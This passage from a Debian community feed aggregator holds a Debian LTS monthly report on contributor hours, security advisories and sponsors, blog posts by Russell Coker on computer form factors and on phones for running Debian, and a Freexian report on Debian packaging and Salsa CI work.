<li><a href="https://lists.debian.org/debian-lts/2024/03/msg00009.html">Daniel Leidert</a>
did 10.0h (out of 10.0h assigned).</li>
<li><a href="https://people.debian.org/~pochu/lts/reports/2024-02.txt">Emilio Pozuelo Monfort</a>
did 3.0h (out of 28.25h assigned and 31.75h from previous period), thus carrying over 57.0h to the next month.</li>
<li><a href="https://lists.debian.org/msgid-search/?m=wr9W91X07BdEqlUY@debian.org">Guilhem Moulin</a>
did 7.25h (out of 4.75h assigned and 15.25h from previous period), thus carrying over 12.75h to the next month.</li>
<li>Holger Levsen
did 0.5h (out of 3.5h assigned and 8.5h from previous period), thus carrying over 11.5h to the next month.</li>
<li>Lee Garrett
did 0.0h (out of 18.25h assigned and 41.75h from previous period), thus carrying over 60.0h to the next month.</li>
<li><a href="https://dl.gambaru.de/blog/202402_LTS_report.txt">Markus Koschany</a>
did 40.0h (out of 40.0h assigned).</li>
<li><a href="https://people.debian.org/~roberto/lts_elts_reports/2024-02.txt">Roberto C. Sánchez</a>
did 3.5h (out of 8.75h assigned and 3.25h from previous period), thus carrying over 8.5h to the next month.</li>
<li><a href="https://people.debian.org/~santiago/lts-elts-reports/report-2024-02.txt">Santiago Ruano Rincón</a>
did 13.5h (out of 13.5h assigned and 2.5h from previous period), thus carrying over 2.5h to the next month.</li>
<li><a href="https://lists.debian.org/debian-lts/2024/03/msg00001.html">Sean Whitton</a>
did 4.5h (out of 0.5h assigned and 5.5h from previous period), thus carrying over 1.5h to the next month.</li>
<li><a href="https://lists.debian.org/debian-lts/2024/03/msg00003.html">Sylvain Beucler</a>
did 24.5h (out of 27.75h assigned and 32.25h from previous period), thus carrying over 35.5h to the next month.</li>
<li><a href="http://blog.alteholz.eu/2024/03/my-debian-activities-in-february-2024/">Thorsten Alteholz</a>
did 14.0h (out of 14.0h assigned).</li>
<li><a href="https://lists.debian.org/debian-lts/2024/03/msg00005.html">Tobias Frost</a>
did 12.0h (out of 12.0h assigned).</li>
<li><a href="https://utkarsh2102.org/posts/foss-in-feb-24/">Utkarsh Gupta</a>
did 11.25h (out of 26.75h assigned and 33.25h from previous period), thus carrying over 48.75 to the next month.</li>
</ul>
<h3 id="evolution-of-the-situation">Evolution of the situation</h3>
<p>In February, we have released <a href="https://lists.debian.org/debian-lts-announce/2024/02/threads.html">17 DLAs</a>.</p>
<p>The number of DLAs published during February was a bit lower than usual, as there was much work going on in the area of triaging CVEs (a number of which turned out to not affect Debia buster, and others which ended up being duplicates, or otherwise determined to be invalid). Of the packages which did receive updates, notable were <a href="https://lists.debian.org/debian-lts-announce/2024/02/msg00002.html">sudo</a> (to fix a privilege management issue), and <a href="https://lists.debian.org/debian-lts-announce/2024/02/msg00008.html">iwd</a> and <a href="https://lists.debian.org/debian-lts-announce/2024/02/msg00013.html">wpa</a> (both of which suffered from authentication bypass vulnerabilities).</p>
<p>While this has already been already announced in the Freexian blog, we would like to mention here the start of the <a href="https://www.freexian.com/blog/samba-4.17-lts/">Long Term Support project for Samba 4.17</a>. You can find all the important details in that post, but we would like to highlight that it is thanks to our LTS sponsors that we are able to fund the work from our partner, <a href="https://www.catalyst.net.nz/samba-and-windows-integration">Catalyst</a>, towards improving the security support of Samba in Debian 12 (Bookworm).</p>
<h3 id="thanks-to-our-sponsors">Thanks to our sponsors</h3>
<p>Sponsors that joined recently are in bold.</p>
<ul>
<li>Platinum sponsors:
<ul>
<li><a href="http://www.toshiba.co.jp/worldwide/index.html">TOSHIBA</a> (for 102 months)</li>
<li><a href="https://cip-project.org">Civil Infrastructure Platform (CIP)</a> (for 70 months)</li>
</ul>
</li>
<li>Gold sponsors:
<ul>
<li><a href="https://www.roche.com/about/business/diagnostics.htm">Roche Diagnostics International AG</a> (for 113 months)</li>
<li><a href="http://www.linode.com">Linode</a> (for 107 months)</li>
<li><a href="http://www.babiel.com">Babiel GmbH</a> (for 96 months)</li>
<li><a href="https://www.plathome.com">Plat’Home</a> (for 96 months)</li>
<li><a href="https://www.cineca.it">CINECA</a> (for 70 months)</li>
<li><a href="http://www.ox.ac.uk">University of Oxford</a> (for 52 months)</li>
<li><a href="https://deveryware.com">Deveryware</a> (for 39 months)</li>
<li><a href="https://vyos.io">VyOS Inc</a> (for 34 months)</li>
<li><a href="https://www.edf.fr">EDF SA</a> (for 23 months)</li>
</ul>
</li>
<li>Silver sponsors:
<ul>
<li><a href="http://www.domainnameshop.com">Domeneshop AS</a> (for 117 months)</li>
<li><a href="http://www.nantesmetropole.fr/">Nantes Métropole</a> (for 112 months)</li>
<li><a href="http://www.univention.de">Univention GmbH</a> (for 103 months)</li>
<li><a href="http://portail.univ-st-etienne.fr/">Université Jean Monnet de St Etienne</a> (for 103 months)</li>
<li><a href="https://ribboncommunications.com/">Ribbon Communications, Inc.</a> (for 97 months)</li>
<li><a href="https://www.exonet.nl">Exonet B.V.</a> (for 87 months)</li>
<li><a href="https://www.lrz.de">Leibniz Rechenzentrum</a> (for 81 months)</li>
<li><a href="https://www.diplomatie.gouv.fr">Ministère de l’Europe et des Affaires Étrangères</a> (for 64 months)</li>
<li><a href="https://www.cloudways.com">Cloudways by DigitalOcean</a> (for 54 months)</li>
<li><a href="https://dinahosting.com">Dinahosting SL</a> (for 52 months)</li>
<li><a href="https://www.bauermedia.com">Bauer Xcel Media Deutschland KG</a> (for 46 months)</li>
<li><a href="https://platform.sh">Platform.sh SAS</a> (for 46 months)</li>
<li><a href="https://www.moxa.com">Moxa Inc.</a> (for 40 months)</li>
<li><a href="https://sipgate.de">sipgate GmbH</a> (for 37 months)</li>
<li><a href="https://ovhcloud.com">OVH US LLC</a> (for 35 months)</li>
<li><a href="https://www.tilburguniversity.edu/">Tilburg University</a> (for 35 months)</li>
<li><a href="https://www.gsi.de">GSI Helmholtzzentrum für Schwerionenforschung GmbH</a> (for 27 months)</li>
<li><a href="https://www.soliton.co.jp">Soliton Systems K.K.</a> (for 24 months)</li>
</ul>
</li>
<li>Bronze sponsors:
<ul>
<li><a href="http://www.evolix.fr">Evolix</a> (for 118 months)</li>
<li><a href="http://www.seznam.cz">Seznam.cz, a.s.</a> (for 118 months)</li>
<li><a href="http://intevation.de">Intevation GmbH</a> (for 115 months)</li>
<li><a href="http://linuxhotel.de">Linuxhotel GmbH</a> (for 115 months)</li>
<li><a href="https://waays.fr">Daevel SARL</a> (for 113 months)</li>
<li><a href="http://bitfolk.com">Bitfolk LTD</a> (for 112 months)</li>
<li><a href="http://www.megaspace.de">Megaspace Internet Services GmbH</a> (for 112 months)</li>
<li><a href="http://numlog.fr">NUMLOG</a> (for 112 months)</li>
<li><a href="http://www.greenbone.net">Greenbone AG</a> (for 111 months)</li>
<li><a href="http://www.wingo.ch/">WinGo AG</a> (for 111 months)</li>
<li><a href="http://lheea.ec-nantes.fr">Ecole Centrale de Nantes - LHEEA</a> (for 107 months)</li>
<li><a href="https://www.entrouvert.com/">Entr’ouvert</a> (for 102 months)</li>
<li><a href="https://adfinis.com">Adfinis AG</a> (for 99 months)</li>
<li><a href="http://www.allogarage.fr">GNI MEDIA</a> (for 94 months)</li>
<li><a href="http://www.legi.grenoble-inp.fr">Laboratoire LEGI - UMR 5519 / CNRS</a> (for 94 months)</li>
<li><a href="https://www.tesorion.nl/">Tesorion</a> (for 94 months)</li>
<li><a href="http://bearstech.com">Bearstech</a> (for 85 months)</li>
<li><a href="http://lihas.de">LiHAS</a> (for 85 months)</li>
<li><a href="http://www.catalyst.net.nz">Catalyst IT Ltd</a> (for 80 months)</li>
<li><a href="http://www.supagro.fr">Supagro</a> (for 75 months)</li>
<li><a href="https://demarcq.net">Demarcq SAS</a> (for 74 months)</li>
<li><a href="https://www.univ-grenoble-alpes.fr">Université Grenoble Alpes</a> (for 60 months)</li>
<li><a href="https://www.touchweb.fr">TouchWeb SAS</a> (for 52 months)</li>
<li><a href="https://www.spin-ag.de">SPiN AG</a> (for 49 months)</li>
<li><a href="https://www.corefiling.com">CoreFiling</a> (for 44 months)</li>
<li><a href="http://www.isc.cnrs.fr">Institut des sciences cognitives Marc Jeannerod</a> (for 39 months)</li>
<li><a href="https://www.osug.fr/">Observatoire des Sciences de l’Univers de Grenoble</a> (for 36 months)</li>
<li><a href="https://www.werfen.com">Tem Innovations GmbH</a> (for 31 months)</li>
<li><a href="https://wordfinder.pro">WordFinder.pro</a> (for 30 months)</li>
<li><a href="https://www.resif.fr">CNRS DT INSU Résif</a> (for 29 months)</li>
<li><a href="https://www.alterway.fr">Alter Way</a> (for 22 months)</li>
<li><a href="https://math.univ-lyon1.fr">Institut Camille Jordan</a> (for 11 months)</li>
</ul>
</li>
</ul>2024-03-14T00:00:00+00:00Roberto C. SánchezRussell Coker: The Shape of Computers
https://etbe.coker.com.au/2024/03/13/shape-computers/
<h2>Introduction</h2>
<p>There have been many experiments with the sizes of computers, some of which have stayed around and some have gone away. The trend has been to make computers smaller, the early computers had buildings for them. Recently for come classes computers have started becoming as small as could be reasonably desired. For example phones are thin enough that they can blow away in a strong breeze, smart watches are much the same size as the old fashioned watches they replace, and NUC type computers are as small as they need to be given the size of monitors etc that they connect to.</p>
<p>This means that further development in the size and shape of computers will largely be determined by human factors.</p>
<p>I think we need to consider how computers might be developed to better suit humans and how to write free software to make such computers usable without being constrained by corporate interests.</p>
<p>Those of us who are involved in developing OSs and applications need to consider how to adjust to the changes and ideally anticipate changes. While we can’t anticipate the details of future devices we can easily predict general trends such as being smaller, higher resolution, etc.</p>
<h2>Desktop/Laptop PCs</h2>
<p>When home computers first came out it was standard to have the keyboard in the main box, the Apple ][ being the most well known example. This has lost popularity due to the demand to have multiple options for a light keyboard that can be moved for convenience combined with multiple options for the box part. But it still pops up occasionally such as the <a href="https://www.raspberrypi.com/products/raspberry-pi-400/">Raspberry Pi 400 [1]</a> which succeeds due to having the computer part being small and light. I think this type of computer will remain a niche product. It could be used in a “add a screen to make a laptop” as opposed to the “add a keyboard to a tablet to make a laptop” model – but a tablet without a keyboard is more useful than a non-server PC without a display.</p>
<p>The PC as “box with connections for keyboard, display, etc” has a long future ahead of it. But the sizes will probably decrease (they should have stopped making PC cases to fit CD/DVD drives at least 10 years ago). The NUC size is a useful option and I think that DVD drives will stop being used for software soon which will allow a range of smaller form factors.</p>
<p>The regular laptop is something that will remain useful, but the tablet with detachable keyboard devices could take a lot of that market. Full functionality for all tasks requires a keyboard because at the moment <a href="https://jenson.org/text/">text editing with a touch screen is an unsolved problem in computer science [2]</a>.</p>
<p>The <a href="https://www.zdnet.com/article/lenovos-thinkpad-x1-fold-is-the-most-bizarre-fun-and-expensive-laptop-ive-ever-tested/">Lenovo Thinkpad X1 Fold [3]</a> and related Lenovo products are very interesting. Advances in materials allow laptops to be thinner and lighter which leaves the screen size as a major limitation to portability. There is a conflict between desiring a large screen to see lots of content and wanting a small size to carry and making a device foldable is an obvious solution that has recently become possible. Making a foldable laptop drives a desire for not having a permanently attached keyboard which then makes a touch screen keyboard a requirement. So this means that user interfaces for PCs have to be adapted to work well on touch screens. The Think line seems to be continuing the history of innovation that it had when owned by IBM. There are also a range of other laptops that have two regular screens so they are essentially the same as the Thinkpad X1 Fold but with two separate screens instead of one folding one, prices are as low as $600US.</p>
<p>I think that the typical interfaces for desktop PCs (EG MS-Windows and KDE) don’t work well for small devices and touch devices and the Android interface generally isn’t a good match for desktop systems. We need to invent more options for this. This is not a criticism of KDE, I use it every day and it works well. But it’s designed for use cases that don’t match new hardware that is on sale. As an aside it would be nice if Lenovo gave samples of their newest gear to people who make significant contributions to GUIs. Give a few Thinkpad Fold devices to KDE people, a few to GNOME people, and a few others to people involved in Wayland development and see how that promotes software development and future sales.</p>
<p>We also need to adopt features from laptops and phones into desktop PCs. When voice recognition software was first released in the 90s it was for desktop PCs, it didn’t take off largely because it wasn’t very accurate (none of them recognised my voice). Now voice recognition in phones is very accurate and it’s very common for desktop PCs to have a webcam or headset with a microphone so it’s time for this to be re-visited. GPS support in laptops is obviously useful and can work via Wifi location, via a USB GPS device, or via wwan mobile phone hardware (even if not used for wwan networking). Another possibility is using the same software interfaces as used for GPS on laptops for a static definition of location for a desktop PC or server.</p>
<h2>The Interesting New Things</h2>
<h3>Watch Like</h3>
<p>The <a href="https://en.wikipedia.org/wiki/Watch">wrist-watch [4]</a> has been a standard format for easy access to data when on the go since it’s military use at the end of the 19th century when the practical benefits beat the supposed femininity of the watch. So it seems most likely that they will continue to be in widespread use in computerised form for the forseeable future. For comparison smart phones have been in widespread use as “pocket watches” for about 10 years.</p>
<p>The question is how will watch computers end up? Will we have Dick Tracy style watch phones that you speak into? Will it be the current smart watch functionality of using the watch to answer a call which goes to a bluetooth headset? Will smart watches end up taking over the functionality of the <a href="https://en.wikipedia.org/wiki/Calculator_watch">calculator watch [5]</a> which was popular in the 80’s? With today’s technology you could easily have a fully capable PC strapped to your forearm, would that be useful?</p>
<h3>Phone Like</h3>
<p>Folding phones (originally popularised as Star Trek Tricorders) seem likely to have a long future ahead of them. Engineering technology has only recently developed to the stage of allowing them to work the way people would hope them to work (a folding screen with no gaps). <a href="https://www.notebookcheck.net/Huawei-and-Samsung-reportedly-launching-foldable-tablets-onto-the-market-soon-while-Oppo-and-Vivo-are-pulling-out.803325.0.html">Phones and tablets with multiple folds are coming out now [6]</a>. This will allow phones to take much of the market share that tablets used to have while tablets and laptops merge at the high end. <a href="https://etbe.coker.com.au/2023/05/29/considering-convergence/">I’ve previously written about Convergence between phones and desktop computers [7]</a>, the increased capabilities of phones adds to the case for Convergence.</p>
<p>Folding phones also provide new possibilities for the OS. The Oppo OnePlus Open and the Google Pixel Fold both have a UI based around using the two halves of the folding screen for separate data at some times. I think that the current user interfaces for desktop PCs don’t properly take advantage of multiple monitors and the possibilities raised by folding phones only adds to the lack. My pet peeve with multiple monitor setups is when they don’t make it obvious which monitor has keyboard focus so you send a CTRL-W or ALT-F4 to the wrong screen by mistake, it’s a problem that also happens on a single screen but is worse with multiple screens. There are rumours of phones described as “three fold” (where three means the number of segments – with two folds between them), it will be interesting to see how that goes.</p>
<p>Will phones go the same way as PCs in terms of having a separation between the compute bit and the input device? It’s quite possible to have a compute device in the phone form factor inside a secure pocket which talks via Bluetooth to another device with a display and speakers. Then you could change your phone between a phone-size display and a tablet sized display easily and when using your phone a thief would not be able to easily steal the compute bit (which has passwords etc). Could the “watch” part of the phone (strapped to your wrist and difficult to steal) be the active part and have a tablet size device as an external display? There are already announcements of smart watches with up to 1GB of RAM (same as the Samsung Galaxy S3), that’s enough for a lot of phone functionality.</p>
<p>The <a href="https://www.theverge.com/2024/1/9/24030667/rabbit-r1-ai-action-model-price-release-date">Rabbit R1 [8]</a> and the <a href="https://www.theverge.com/2023/11/8/23953022/humane-ai-pin-price-specs-leak">Humane AI Pin [9]</a> have some interesting possibilities for AI speech interfaces. Could that take over some of the current phone use? It seems that visually impaired people have been doing badly in the trend towards touch screen phones so an option of a voice interface phone would be a good option for them. As an aside I hope some people are working on AI stuff for FOSS devices.</p>
<h3>Laptop Like</h3>
<p>One interesting PC variant I just discovered is the <a href="https://www.aliexpress.com/store/1103322555">Higole 2 Pro portable battery operated Windows PC with 5.5″ touch screen [10]</a>. It looks too thick to fit in the same pockets as current phones but is still very portable. The version with built in battery is $AU423 which is in the usual price range for low end laptops and tablets. I don’t think this is the future of computing, but it is something that is usable today while we wait for foldable devices to take over.</p>
<p>The recent release of the <a href="https://en.wikipedia.org/wiki/Apple_Vision_Pro">Apple Vision Pro [11]</a> has driven interest in 3D and head mounted computers. I think this could be a useful peripheral for a laptop or phone but it won’t be part of a primary computing environment. In 2011 I wrote about <a href="https://etbe.coker.com.au/2011/10/28/desktop-augmented-reality/">the possibility of using augmented reality technology for providing a desktop computing environment [12]</a>. I wonder how a Vision Pro would work for that on a train or passenger jet.</p>
<p>Another interesting thing that’s on offer is a <a href="https://www.aliexpress.com/item/1005005999353358.html">laptop with 7″ touch screen beside the keyboard [13]</a>. It seems that someone just looked at what parts are available cheaply in China (due to being parts of more popular devices) and what could fit together. I think a keyboard should be central to the monitor for serious typing, but there may be useful corner cases where typing isn’t that common and a touch-screen display is of use. Developing a range of strange hardware and then seeing which ones get adopted is a good thing and an advantage of Ali Express and Temu.</p>
<h2>Useful Hardware for Developing These Things</h2>
<p><a href="https://etbe.coker.com.au/2024/01/29/thinkpad-x1-yoga-gen3/">I recently bought a second hand Thinkpad X1 Yoga Gen3 for $359 which has stylus support [14]</a>, and it’s generally a great little laptop in every other way. There’s a common failure case of that model where touch support for fingers breaks but the stylus still works which allows it to be used for testing touch screen functionality while making it cheap.</p>
<p><a href="https://etbe.coker.com.au/2023/10/21/more-about-pinetime/">The PineTime is a nice smart watch from Pine64 which is designed to be open [15]</a>. I am quite happy with it but haven’t done much with it yet (apart from wearing it every day and getting alerts etc from Android). At $50 when delivered to Australia it’s significantly more expensive than most smart watches with similar features but still a lot cheaper than the high end ones. Also the <a href="https://www.raspberrypi.com/news/how-to-build-your-own-raspberry-pi-watch/">Raspberry Pi Watch [16]</a> is interesting too.</p>
<p><a href="https://etbe.coker.com.au/2023/10/11/pinephone-status/">The PinePhonePro is an OK phone made to open standards but it’s hardware isn’t as good as Android phones released in the same year [17]</a>. I’ve got some useful stuff done on mine, but the battery life is a major issue and the screen resolution is low. The <a href="https://etbe.coker.com.au/2022/03/19/more-librem5/">Librem 5 phone from Purism has a better hardware design for security with switches to disable functionality [18]</a>, but it’s even slower than the PinePhonePro. These are good devices for test and development but not ones that many people would be excited to use every day.</p>
<p>Wwan hardware (for accessing the phone network) in M.2 form factor can be obtained for free if you have access to old/broken laptops. Such devices start at about $35 if you want to buy one. USB GPS devices also start at about $35 so probably not worth getting if you can get a wwan device that does GPS as well.</p>
<h2>What We Must Do</h2>
<p>Debian appears to have some voice input software in the pocketsphinx package but no documentation on how it’s to be used. This would be a good thing to document, I spent 15 mins looking at it and couldn’t get it going.</p>
<p>To take advantage of the hardware features in phones we need software support and we ideally don’t want free software to lag too far behind proprietary software – which IMHO means the typical Android setup for phones/tablets.</p>
<p>Support for changing screen resolution is already there as is support for touch screens. Support for adapting the GUI to changed screen size is something that needs to be done – even today’s hardware of connecting a small laptop to an external monitor doesn’t have the ideal functionality for changing the UI. There also seem to be some limitations in touch screen support with multiple screens, I haven’t investigated this properly yet, it definitely doesn’t work in an expected manner in Ubuntu 22.04 and I haven’t yet tested the combinations on Debian/Unstable.</p>
<p>ML is becoming a big thing and it has some interesting use cases for small devices where a smart device can compensate for limited input options. There’s a lot of work that needs to be done in this area and we are limited by the fact that we can’t just rip off the work of other people for use as training data in the way that corporations do.</p>
<p>Security is more important for devices that are at high risk of theft. The vast majority of free software installations are way behind Android in terms of security and we need to address that. I have some ideas for improvement but there is always a conflict between security and usability and while Android is usable for it’s own special apps it’s not usable in a “I want to run applications that use any files from any other applicationsin any way I want” sense. My post about <a href="https://etbe.coker.com.au/2023/07/08/sandboxing-phone-apps/">Sandboxing Phone apps is relevant for people who are interested in this [19]</a>. We also need to extend security models to cope with things like “ok google” type functionality which has the potential to be a bug and the emerging class of LLM based attacks.</p>
<p>I will write more posts about these thing.</p>
<p>Please write comments mentioning FOSS hardware and software projects that address these issues and also documentation for such things.</p>
<ul>
<li>[1]<a href="https://www.raspberrypi.com/products/raspberry-pi-400/"> https://www.raspberrypi.com/products/raspberry-pi-400/</a></li>
<li>[2]<a href="https://jenson.org/text/"> https://jenson.org/text/</a></li>
<li>[3]<a href="https://www.zdnet.com/article/lenovos-thinkpad-x1-fold-is-the-most-bizarre-fun-and-expensive-laptop-ive-ever-tested/"> http://tinyurl.com/27lrakl6</a></li>
<li>[4]<a href="https://en.wikipedia.org/wiki/Watch"> https://en.wikipedia.org/wiki/Watch</a></li>
<li>[5]<a href="https://en.wikipedia.org/wiki/Calculator_watch"> https://en.wikipedia.org/wiki/Calculator_watch</a></li>
<li>[6]<a href="https://www.notebookcheck.net/Huawei-and-Samsung-reportedly-launching-foldable-tablets-onto-the-market-soon-while-Oppo-and-Vivo-are-pulling-out.803325.0.html"> http://tinyurl.com/27gb7zrq</a></li>
<li>[7]<a href="https://etbe.coker.com.au/2023/05/29/considering-convergence/"> https://etbe.coker.com.au/2023/05/29/considering-convergence/</a></li>
<li>[8]<a href="https://www.theverge.com/2024/1/9/24030667/rabbit-r1-ai-action-model-price-release-date"> http://tinyurl.com/yuurhkvm</a></li>
<li>[9]<a href="https://www.theverge.com/2023/11/8/23953022/humane-ai-pin-price-specs-leak"> http://tinyurl.com/ytmw42bt</a></li>
<li>[10]<a href="https://www.aliexpress.com/store/1103322555"> https://www.aliexpress.com/store/1103322555</a></li>
<li>[11]<a href="https://en.wikipedia.org/wiki/Apple_Vision_Pro"> https://en.wikipedia.org/wiki/Apple_Vision_Pro</a></li>
<li>[12]<a href="https://etbe.coker.com.au/2011/10/28/desktop-augmented-reality/"> https://etbe.coker.com.au/2011/10/28/desktop-augmented-reality/</a></li>
<li>[13]<a href="https://www.aliexpress.com/item/1005005999353358.html"> https://www.aliexpress.com/item/1005005999353358.html</a></li>
<li>[14]<a href="https://etbe.coker.com.au/2024/01/29/thinkpad-x1-yoga-gen3/"> https://etbe.coker.com.au/2024/01/29/thinkpad-x1-yoga-gen3/</a></li>
<li>[15]<a href="https://etbe.coker.com.au/2023/10/21/more-about-pinetime/"> https://etbe.coker.com.au/2023/10/21/more-about-pinetime/</a></li>
<li>[16]<a href="https://www.raspberrypi.com/news/how-to-build-your-own-raspberry-pi-watch/"> http://tinyurl.com/24myjjqn</a></li>
<li>[17]<a href="https://etbe.coker.com.au/2023/10/11/pinephone-status/"> https://etbe.coker.com.au/2023/10/11/pinephone-status/</a></li>
<li>[18]<a href="https://etbe.coker.com.au/2022/03/19/more-librem5/"> https://etbe.coker.com.au/2022/03/19/more-librem5/</a></li>
<li>[19]<a href="https://etbe.coker.com.au/2023/07/08/sandboxing-phone-apps/"> https://etbe.coker.com.au/2023/07/08/sandboxing-phone-apps/</a></li>
</ul>
<div class="yarpp yarpp-related yarpp-related-rss yarpp-template-list">
<p>Related posts:</p><ol>
<li><a href="https://etbe.coker.com.au/2010/01/31/my-ideal-mobile-phone/" rel="bookmark" title="My Ideal Mobile Phone">My Ideal Mobile Phone</a> <small>Based on my experience testing the IBM Seer software on...</small></li>
<li><a href="https://etbe.coker.com.au/2023/06/01/desktop-computers-sense/" rel="bookmark" title="Do Desktop Computers Make Sense?">Do Desktop Computers Make Sense?</a> <small>Laptop vs Desktop Price Currently the smaller and cheaper USB-C...</small></li>
<li><a href="https://etbe.coker.com.au/2009/10/18/mobile-phones-are-computers/" rel="bookmark" title="Mobile Phones Are Computers">Mobile Phones Are Computers</a> <small>One thing I noticed when I got my new LG...</small></li>
</ol>
</div>2024-03-13T12:16:01+00:00etbeFreexian Collaborators: Debian Contributions: Upcoming Improvements to Salsa CI, /usr-move, packaging simplemonitor, and more! (by Utkarsh Gupta)
https://www.freexian.com/blog/debian-contributions-02-2024/
<p><a href="https://www.freexian.com/about/debian-contributions/">Contributing to Debian</a>
is part of <a href="https://www.freexian.com/about/">Freexian’s mission</a>. This article
covers the latest achievements of Freexian and their collaborators. All of this
is made possible by organizations subscribing to our
<a href="https://www.freexian.com/lts/">Long Term Support contracts</a> and
<a href="https://www.freexian.com/services/">consulting services</a>.</p>
<h2 id="usr-move-by-helmut-grohne">/usr-move, by Helmut Grohne</h2>
<p>Much of the work was spent on handling interaction with time time64 transition
and sending patches for mitigating fallout. The set of packages relevant to
<code>debootstrap</code> is mostly converted and the patches for <code>glibc</code> and <code>base-files</code>
have been refined due to feedback from the upload to Ubuntu noble. Beyond this,
he sent patches for all remaining packages that cannot move their files with
<code>dh-sequence-movetousr</code> and packages using <code>dpkg-divert</code> in ways that <code>dumat</code>
would not recognize.</p>
<h2 id="upcoming-improvements-to-salsa-ci-by-santiago-ruano-rincón">Upcoming improvements to Salsa CI, by Santiago Ruano Rincón</h2>
<p>Last month, Santiago Ruano Rincón started the work on integrating sbuild into
the Salsa CI pipeline. Initially, Santiago used sbuild with the <code>unshare</code>
chroot mode. However, after discussion with josch, jochensp and helmut (thanks
to them!), it turns out that the unshare mode is not the most suitable for the
pipeline, since the level of isolation it provides is not needed, and some test
suites would fail (eg: krb5). Additionally, one of the requirements of the
build job is the use of ccache, since it is needed by some C/C++ large projects
to reduce the compilation time. In the preliminary work with unshare last
month, it was not possible to make ccache to work.</p>
<p>Finally, Santiago changed the chroot mode, and now has a couple of POC (cf:
<a href="https://salsa.debian.org/santiago/pipeline/-/tree/sbuild-schroot?ref_type=heads">1</a>
and <a href="https://salsa.debian.org/santiago/pipeline/-/commits/sbuild-sudo">2</a>)
that rely on the <code>schroot</code> and <code>sudo</code>, respectively. And the good news is that
ccache is successfully used by sbuild with schroot!</p>
<img src="https://www.freexian.com/images/debian-funding-february-salsaci.png" style="float: right;" />
<p>The image here comes from an example of building <code>grep</code>. At the end of the
build, <code>ccache -s</code> shows the statistics of the cache that it used, and so a
little more than half of the calls of that job were cacheable. The most
important pieces are in place to finish the integration of sbuild into the
pipeline.</p>
<p>Other than that, Santiago also reviewed the very useful
<a href="https://salsa.debian.org/salsa-ci-team/pipeline/-/merge_requests/346">merge request !346</a>,
made by IOhannes zmölnig to autodetect the release from debian/changelog. As
agreed with IOhannes, Santiago is preparing a merge request to include the
release autodetection use case in the very own Salsa CI’s CI.</p>
<h2 id="packaging-simplemonitor-by-carles-pina-i-estany">Packaging simplemonitor, by Carles Pina i Estany</h2>
<p>Carles started using <a href="https://simplemonitor.readthedocs.io/">simplemonitor</a> in
2017, opened a
<a href="https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1016113">WNPP bug</a> in 2022
and started packaging simplemonitor dependencies in October 2023. After
packaging five direct and indirect dependencies, Carles finally uploaded
simplemonitor to unstable in February.</p>
<p>During the packaging of simplemonitor, Carles reported
<a href="https://github.com/jamesoff/simplemonitor/issues?q=is%3Aissue+author%3Acpina+created%3A2024-01-01..2024-03-01">a few issues</a>
to upstream. Some of these were to make the simplemonitor package build and run
tests reproducibly. A reproducibility issue was reprotest overriding the
timezone, which broke simplemonitor’s tests. There have been discussions on
resolving this upstream in simplemonitor and
<a href="https://salsa.debian.org/reproducible-builds/reprotest/-/issues/11">in reprotest</a>,
too.</p>
<p>Carles also started upgrading or improving some of simplemonitor’s dependencies.</p>
<h2 id="miscellaneous-contributions">Miscellaneous contributions</h2>
<ul>
<li>Stefano Rivera spent some time doing admin on debian.social infrastructure.
Including dealing with a spike of abuse on the Jitsi server.</li>
<li>Stefano started to prepare a new release of dh-python, including cleaning out
a lot of old Python 2.x related code. Thanks to Niels Thykier (outside
Freexian) for spear-heading this work.</li>
<li>DebConf 24 planning is beginning. Stefano discussed venues and finances with
the local team and remotely supported a site-visit by Nattie (outside
Freexian).</li>
<li>Also in the DebConf 24 context, Santiago took part in discussions and
preparations related to the Content Team.</li>
<li>A <a href="https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1062460">JIT bug</a> was
reported against pypy3 in Debian Bookworm. Stefano bisected the upstream
history to find the patch (it was already resolved upstream) and released an
update to pypy3 in bookworm.</li>
<li>Enrico participated in /usr-merge discussions with Helmut.</li>
<li>Colin Watson backported a
<a href="https://bugs.debian.org/1027387">python-channels-redis fix</a> to bookworm,
rediscovered while working on
<a href="https://freexian-team.pages.debian.net/debusine/">debusine</a>.</li>
<li>Colin dug into a cluster of celery build failures and tracked the hardest bit
down to a <a href="https://bugs.debian.org/1063345">Python 3.12 regression</a>, now
fixed in unstable. celery should be back in testing once the 64-bit time_t
migration is out of the way.</li>
<li>Thorsten Alteholz uploaded a new upstream version of cpdb-libs. Unfortunately
upstream changed the naming of their release tags, so updating the watch file
was a bit demanding. Anyway this version 2.0 is a huge step towards
introduction of the new Common Print Dialog Backends.</li>
<li>Helmut send patches for 48 cross build failures.</li>
<li>Helmut changed debvm to use mkfs.ext4 instead of genext2fs.</li>
<li>Helmut sent a
<a href="https://salsa.debian.org/ci-team/debci/-/merge_requests/271">debci MR</a>
for improving collector robustness.</li>
<li>In preparation for DebConf 25, Santiago worked on the Brest Bid.</li>
</ul>2024-03-13T00:00:00+00:00Utkarsh GuptaRussell Coker: Android vs FOSS Phones
https://etbe.coker.com.au/2024/03/12/android-vs-foss-phones/
<p>To achieve my aims regarding <a href="https://etbe.coker.com.au/2023/05/29/considering-convergence/">Convergence of mobile phone and PC [1]</a> I need something a big bigger than the 4G of RAM that’s in the <a href="https://en.wikipedia.org/wiki/PinePhone_Pro">PinePhone Pro [2]</a>. The PinePhonePro was released at the end of 2021 but has a SoC that was first released in 2016. That SoC seems to compare well to the ones used in the Pixel and Pixel 2 phones that were released in the same time period so it’s not a bad SoC, but it doesn’t compare well to more recent Android devices and it also isn’t a great fit for the non-Android things I want to do. Also the PinePhonePro and Librem5 have relatively short battery life so reusing Android functionality for power saving could provide a real benefit. So I want a phone designed for the mass market that I can use for running Debian.</p>
<h2>PostmarketOS</h2>
<p>One thing I’m definitely not going to do is attempt a full port of Linux to a different platform or support of kernel etc. So I need to choose a device that already has support from a somewhat free Linux system. The PostmarketOS system is the first I considered, the <a href="https://wiki.postmarketos.org/wiki/Devices">PostmarketOS Wiki page of supported devices [3]</a> was the first place I looked. The “main” supported devices are the PinePhone (not Pro) and the Librem5, both of which are under-powered. For the “community” devices there seems to be nothing that supports calls, SMS, mobile data, and USB-OTG and which also has 4G of RAM or more. If I skip USB-OTG (which presumably means I’d have to get dock functionality via wifi – not impossible but not great) then I’m left with the SHIFT6mq which was never sold in Australia and the Xiomi POCO F1 which doesn’t appear to be available on ebay.</p>
<h2>LineageOS</h2>
